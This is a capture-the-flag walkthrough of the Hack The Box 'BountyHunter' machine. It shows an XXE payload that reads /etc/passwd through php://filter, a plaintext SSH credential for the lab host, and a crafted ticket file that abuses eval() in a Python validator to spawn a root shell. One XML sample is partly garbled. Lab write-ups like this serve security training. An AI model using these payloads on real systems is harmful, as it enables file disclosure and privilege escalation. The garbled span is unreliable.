Bounty-Hunter-HTB-Writeup

POST /tracker_diRbPr00f314.php HTTP/1.1
Host: bountyhunter.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 211
Origin: http://bountyhunter.htb
Connection: close
Referer: http://bountyhunter.htb/log_submit.php
data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPjE8L2N3ZT4KCQk8Y3Zzcz4xPC9jdnNzPgoJCTxyZXdhcmQ%2BMTwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg%3D%3D
<?xml  version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>test</title>
<cwe>1</cwe>
<cvss>1</cvss>
<reward6ɕ݅ɐ($$՝ɕ7p

Read more about xxe here

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>&xxe;</cwe>
<cvss>&xxe;</cvss>
<reward>&xxe;</reward>
</bugreport>
ssh development@bountyhunter.htb  passwd=m19RoAU0hP41A1sTsq6K
Hey team,I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.I set up the permissions for you to test this. Good luck.-- John
cat /opt/skytrain_inc/ticketValidator.py
----------------------------------------
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main()
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()

After trying:

1- File's extensions = .md
2- The ticket starts with # Skytrain Inc
3- second line is ## Ticket to [destination] which is the root user
4- third line is __Ticket Code:__
5- Add ** in the first of the forth line then add a code in the same line where the code % 7 = 4 and the condition is true at the same time and the code must be greater than 100
# Skytrain Inc   
## Ticket to root
__Ticket Code:__
**
7x14 = 98 // 98 + 4 = 102 // we got our ticket code (102)
**102 + 1 == 103 now the condition is true and we can freely ask for a shell as root
# Skytrain Inc   
## Ticket to root
__Ticket Code:__
**102+ 1 == 103 and __import__('os').system('/bin/bash')

Respect on HTB it won’t take a minute

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store